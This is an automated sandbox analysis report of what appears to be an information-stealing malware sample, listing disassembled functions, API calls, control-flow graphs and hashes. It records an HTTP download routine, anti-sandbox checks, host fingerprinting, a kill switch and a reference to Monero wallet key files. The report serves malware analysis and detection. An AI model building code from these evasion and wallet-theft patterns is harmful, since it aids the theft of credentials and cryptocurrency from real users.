                                  • GetProcAddress.KERNEL32(76910000,0140ED38), ref: 00BBA414
                                  • GetProcAddress.KERNEL32(75B30000,013F5108), ref: 00BBA436
                                  • GetProcAddress.KERNEL32(75B30000,0140ED50), ref: 00BBA44E
                                  • GetProcAddress.KERNEL32(75B30000,0140EBE8), ref: 00BBA466
                                  • GetProcAddress.KERNEL32(75B30000,0140ED98), ref: 00BBA47F
                                  • GetProcAddress.KERNEL32(75B30000,0140EC00), ref: 00BBA497
                                  • GetProcAddress.KERNEL32(75670000,013F5208), ref: 00BBA4B8
                                  • GetProcAddress.KERNEL32(75670000,013F5128), ref: 00BBA4D1
                                  • GetProcAddress.KERNEL32(76AC0000,013F5088), ref: 00BBA4F2
                                  • GetProcAddress.KERNEL32(76AC0000,0140EC18), ref: 00BBA50A
                                  • GetProcAddress.KERNEL32(6F4E0000,013F50C8), ref: 00BBA530
                                  • GetProcAddress.KERNEL32(6F4E0000,013F50E8), ref: 00BBA548
                                  • GetProcAddress.KERNEL32(6F4E0000,013F4FC8), ref: 00BBA560
                                  • GetProcAddress.KERNEL32(6F4E0000,0140F008), ref: 00BBA579
                                  • GetProcAddress.KERNEL32(6F4E0000,013F5228), ref: 00BBA591
                                  • GetProcAddress.KERNEL32(6F4E0000,013F5148), ref: 00BBA5A9
                                  • GetProcAddress.KERNEL32(6F4E0000,013F5188), ref: 00BBA5C2
                                  • GetProcAddress.KERNEL32(6F4E0000,013F52A8), ref: 00BBA5DA
                                  • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00BBA5F1
                                  • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00BBA607
                                  • GetProcAddress.KERNEL32(75AE0000,0140EF18), ref: 00BBA629
                                  • GetProcAddress.KERNEL32(75AE0000,01409CB0), ref: 00BBA641
                                  • GetProcAddress.KERNEL32(75AE0000,0140F0E0), ref: 00BBA659
                                  • GetProcAddress.KERNEL32(75AE0000,0140EF30), ref: 00BBA672
                                  • GetProcAddress.KERNEL32(76300000,013F52C8), ref: 00BBA693
                                  • GetProcAddress.KERNEL32(6D520000,0140F0C8), ref: 00BBA6B4
                                  • GetProcAddress.KERNEL32(6D520000,013F5308), ref: 00BBA6CD
                                  • GetProcAddress.KERNEL32(6D520000,0140EE58), ref: 00BBA6E5
                                  • GetProcAddress.KERNEL32(6D520000,0140EE70), ref: 00BBA6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 2ef686972501acf451894a973d2930121b49c81924a0dbcacdee85234b6f5cb0
                                  • Instruction ID: f4bf81744fbd5892705574388f100ee0396f301ea38e0fa114800c8f6737a924
                                  • Opcode Fuzzy Hash: 2ef686972501acf451894a973d2930121b49c81924a0dbcacdee85234b6f5cb0
                                  • Instruction Fuzzy Hash: 3362FBB5500382AFC354FFACEDC895A3BF9F78C601715851AA609CB364D639B881DB72
                                  Function 00BA6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 ba6280-ba630b call bba7a0 call ba47b0 call bba740 InternetOpenA StrCmpCA 1040 ba630d 1033->1040 1041 ba6314-ba6318 1033->1041 1040->1041 1042 ba6509-ba6525 call bba7a0 call bba800 * 2 1041->1042 1043 ba631e-ba6342 InternetConnectA 1041->1043 1062 ba6528-ba652d 1042->1062 1045 ba6348-ba634c 1043->1045 1046 ba64ff-ba6503 InternetCloseHandle 1043->1046 1048 ba635a 1045->1048 1049 ba634e-ba6358 1045->1049 1046->1042 1051 ba6364-ba6392 HttpOpenRequestA 1048->1051 1049->1051 1053 ba6398-ba639c 1051->1053 1054 ba64f5-ba64f9 InternetCloseHandle 1051->1054 1056 ba639e-ba63bf InternetSetOptionA 1053->1056 1057 ba63c5-ba6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1059 ba642c-ba644b call bb8940 1057->1059 1060 ba6407-ba6427 call bba740 call bba800 * 2 1057->1060 1067 ba64c9-ba64e9 call bba740 call bba800 * 2 1059->1067 1068 ba644d-ba6454 1059->1068 1060->1062 1067->1062 1071 ba6456-ba6480 InternetReadFile 1068->1071 1072 ba64c7-ba64ef InternetCloseHandle 1068->1072 1076 ba648b 1071->1076 1077 ba6482-ba6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 ba648d-ba64c5 call bba9b0 call bba8a0 call bba800 1077->1080 1080->1071
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4839
                                    • Part of subcall function 00BA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4849
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • InternetOpenA.WININET(00BC0DFE,00000001,00000000,00000000,00000000), ref: 00BA62E1
                                  • StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA6303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,01410328,00000000,00000000,00400100,00000000), ref: 00BA6385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA63BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA63D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BA63FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BA646D
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA64EF
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA64F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: a036f7d268ab6b7e7359d73b28229eac48a8dd0bced2fd1808ea1a302bf92803
                                  • Instruction ID: 8630e090f82bdc673d2df07bbb457967e203efb4d3ab94e0bf8c21900b2f7454
                                  • Opcode Fuzzy Hash: a036f7d268ab6b7e7359d73b28229eac48a8dd0bced2fd1808ea1a302bf92803
                                  • Instruction Fuzzy Hash: 88713071A04318ABDB24EBA4CC95FEE77B4FB45700F108198F509AB690DBB46A85CF51
                                  Function 00BB5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 bb5510-bb5577 call bb5ad0 call bba820 * 3 call bba740 * 4 1106 bb557c-bb5583 1090->1106 1107 bb55d7-bb564c call bba740 * 2 call ba1590 call bb52c0 call bba8a0 call bba800 call bbaad0 StrCmpCA 1106->1107 1108 bb5585-bb55b6 call bba820 call bba7a0 call ba1590 call bb51f0 1106->1108 1134 bb5693-bb56a9 call bbaad0 StrCmpCA 1107->1134 1138 bb564e-bb568e call bba7a0 call ba1590 call bb51f0 call bba8a0 call bba800 1107->1138 1124 bb55bb-bb55d2 call bba8a0 call bba800 1108->1124 1124->1134 1139 bb56af-bb56b6 1134->1139 1140 bb57dc-bb5844 call bba8a0 call bba820 * 2 call ba1670 call bba800 * 4 call bb6560 call ba1550 1134->1140 1138->1134 1143 bb57da-bb585f call bbaad0 StrCmpCA 1139->1143 1144 bb56bc-bb56c3 1139->1144 1270 bb5ac3-bb5ac6 1140->1270 1162 bb5991-bb59f9 call bba8a0 call bba820 * 2 call ba1670 call bba800 * 4 call bb6560 call ba1550 1143->1162 1163 bb5865-bb586c 1143->1163 1147 bb571e-bb5793 call bba740 * 2 call ba1590 call bb52c0 call bba8a0 call bba800 call bbaad0 StrCmpCA 1144->1147 1148 bb56c5-bb5719 call bba820 call bba7a0 call ba1590 call bb51f0 call bba8a0 call bba800 1144->1148 1147->1143 1249 bb5795-bb57d5 call bba7a0 call ba1590 call bb51f0 call bba8a0 call bba800 1147->1249 1148->1143 1162->1270 1170 bb598f-bb5a14 call bbaad0 StrCmpCA 1163->1170 1171 bb5872-bb5879 1163->1171 1199 bb5a28-bb5a91 call bba8a0 call bba820 * 2 call ba1670 call bba800 * 4 call bb6560 call ba1550 1170->1199 1200 bb5a16-bb5a21 Sleep 1170->1200 1178 bb587b-bb58ce call bba820 call bba7a0 call ba1590 call bb51f0 call bba8a0 call bba800 1171->1178 1179 bb58d3-bb5948 call bba740 * 2 call ba1590 call bb52c0 call bba8a0 call bba800 call bbaad0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 bb594a-bb598a call bba7a0 call ba1590 call bb51f0 call bba8a0 call bba800 1179->1275 1199->1270 1200->1106 1249->1143 1275->1170
                                  APIs
                                    • Part of subcall function 00BBA820: lstrlen.KERNEL32(00BA4F05,?,?,00BA4F05,00BC0DDE), ref: 00BBA82B
                                    • Part of subcall function 00BBA820: lstrcpy.KERNEL32(00BC0DDE,00000000), ref: 00BBA885
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB56A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5857
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BB51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5228
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5318
                                    • Part of subcall function 00BB52C0: lstrlen.KERNEL32(00000000), ref: 00BB532F
                                    • Part of subcall function 00BB52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00BB5364
                                    • Part of subcall function 00BB52C0: lstrlen.KERNEL32(00000000), ref: 00BB5383
                                    • Part of subcall function 00BB52C0: lstrlen.KERNEL32(00000000), ref: 00BB53AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BB5940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00BB5A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: e8704c51e0b7805e00de0bd9f51b55ce80eefc9ec45fdc74754a3ea326bc4dca
                                  • Instruction ID: f8dfe0a843ef9fada4480a096684ddb0bdf44a2e71f3dc0bcb88fd31115d18ca
                                  • Opcode Fuzzy Hash: e8704c51e0b7805e00de0bd9f51b55ce80eefc9ec45fdc74754a3ea326bc4dca
                                  • Instruction Fuzzy Hash: 3BE1F271D10204ABCB14FBA4DC96EFD77BCAF54300F5085A8B506A6591EFB46E09CBA3
                                  Function 00BB17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 bb17a0-bb17cd call bbaad0 StrCmpCA 1304 bb17cf-bb17d1 ExitProcess 1301->1304 1305 bb17d7-bb17f1 call bbaad0 1301->1305 1309 bb17f4-bb17f8 1305->1309 1310 bb17fe-bb1811 1309->1310 1311 bb19c2-bb19cd call bba800 1309->1311 1313 bb199e-bb19bd 1310->1313 1314 bb1817-bb181a 1310->1314 1313->1309 1316 bb187f-bb1890 StrCmpCA 1314->1316 1317 bb185d-bb186e StrCmpCA 1314->1317 1318 bb1913-bb1924 StrCmpCA 1314->1318 1319 bb1932-bb1943 StrCmpCA 1314->1319 1320 bb18f1-bb1902 StrCmpCA 1314->1320 1321 bb1951-bb1962 StrCmpCA 1314->1321 1322 bb1970-bb1981 StrCmpCA 1314->1322 1323 bb1835-bb1844 call bba820 1314->1323 1324 bb1849-bb1858 call bba820 1314->1324 1325 bb18cf-bb18e0 StrCmpCA 1314->1325 1326 bb198f-bb1999 call bba820 1314->1326 1327 bb18ad-bb18be StrCmpCA 1314->1327 1328 bb1821-bb1830 call bba820 1314->1328 1346 bb189e-bb18a1 1316->1346 1347 bb1892-bb189c 1316->1347 1344 bb187a 1317->1344 1345 bb1870-bb1873 1317->1345 1331 bb1930 1318->1331 1332 bb1926-bb1929 1318->1332 1333 bb194f 1319->1333 1334 bb1945-bb1948 1319->1334 1329 bb190e 1320->1329 1330 bb1904-bb1907 1320->1330 1335 bb196e 1321->1335 1336 bb1964-bb1967 1321->1336 1338 bb198d 1322->1338 1339 bb1983-bb1986 1322->1339 1323->1313 1324->1313 1350 bb18ec 1325->1350 1351 bb18e2-bb18e5 1325->1351 1326->1313 1348 bb18ca 1327->1348 1349 bb18c0-bb18c3 1327->1349 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1335->1313 1336->1335 1338->1313 1339->1338 1344->1313 1345->1344 1355 bb18a8 1346->1355 1347->1355 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00BB17C5
                                  • ExitProcess.KERNEL32 ref: 00BB17D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: e08620cb862ef5d03fa75ab84f6d3247736296c39bccf1e32b30a2bf335edc9a
                                  • Instruction ID: 5b435164732a5766dcf74b0eb4a7d9ebf89e2a6558209711100c0b098692db05
                                  • Opcode Fuzzy Hash: e08620cb862ef5d03fa75ab84f6d3247736296c39bccf1e32b30a2bf335edc9a
                                  • Instruction Fuzzy Hash: CB514174A10249EBCB04DFA8D9A4BFE77F5BF44744F504498E446AB250D7B0E942CB62
                                  Function 00BB7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 bb7500-bb754a GetWindowsDirectoryA 1357 bb754c 1356->1357 1358 bb7553-bb75c7 GetVolumeInformationA call bb8d00 * 3 1356->1358 1357->1358 1365 bb75d8-bb75df 1358->1365 1366 bb75fc-bb7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 bb75e1-bb75fa call bb8d00 1365->1367 1369 bb7619-bb7626 call bba740 1366->1369 1370 bb7628-bb7658 wsprintfA call bba740 1366->1370 1367->1365 1377 bb767e-bb768e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BB7542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BB757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB760A
                                  • wsprintfA.USER32 ref: 00BB7640
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: 35358d48b9647aead2b59814575d3659be9999d2d8cd0325ccd5c179c054040d
                                  • Instruction ID: 14f9be86a09e8238899849bdafb8d255d630b17b3a84edea83a5d2502926a4c1
                                  • Opcode Fuzzy Hash: 35358d48b9647aead2b59814575d3659be9999d2d8cd0325ccd5c179c054040d
                                  • Instruction Fuzzy Hash: 4E4185B1D44348ABDF10DF98DC95BEEBBB8EF58700F100199F505AB280DBB46A44CBA5
                                  Function 00BB69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401A38), ref: 00BB98A1
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401918), ref: 00BB98BA
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,014018B8), ref: 00BB98D2
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401768), ref: 00BB98EA
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,014018E8), ref: 00BB9903
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01409C60), ref: 00BB991B
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,013F5428), ref: 00BB9933
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,013F55E8), ref: 00BB994C
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401750), ref: 00BB9964
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,014018A0), ref: 00BB997C
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401930), ref: 00BB9995
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,014017C8), ref: 00BB99AD
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,013F53A8), ref: 00BB99C5
                                    • Part of subcall function 00BB9860: GetProcAddress.KERNEL32(76210000,01401948), ref: 00BB99DE
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BA11D0: ExitProcess.KERNEL32 ref: 00BA1211
                                    • Part of subcall function 00BA1160: GetSystemInfo.KERNEL32(?), ref: 00BA116A
                                    • Part of subcall function 00BA1160: ExitProcess.KERNEL32 ref: 00BA117E
                                    • Part of subcall function 00BA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BA112B
                                    • Part of subcall function 00BA1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BA1132
                                    • Part of subcall function 00BA1110: ExitProcess.KERNEL32 ref: 00BA1143
                                    • Part of subcall function 00BA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BA123E
                                    • Part of subcall function 00BA1220: __aulldiv.LIBCMT ref: 00BA1258
                                    • Part of subcall function 00BA1220: __aulldiv.LIBCMT ref: 00BA1266
                                    • Part of subcall function 00BA1220: ExitProcess.KERNEL32 ref: 00BA1294
                                    • Part of subcall function 00BB6770: GetUserDefaultLangID.KERNEL32 ref: 00BB6774
                                    • Part of subcall function 00BA1190: ExitProcess.KERNEL32 ref: 00BA11C6
                                    • Part of subcall function 00BB7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7880
                                    • Part of subcall function 00BB7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7887
                                    • Part of subcall function 00BB7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB789F
                                    • Part of subcall function 00BB78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7910
                                    • Part of subcall function 00BB78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7917
                                    • Part of subcall function 00BB78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BB792F
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01409D30,?,00BC110C,?,00000000,?,00BC1110,?,00000000,00BC0AEF), ref: 00BB6ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB6AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB6AF9
                                  • Sleep.KERNEL32(00001770), ref: 00BB6B04
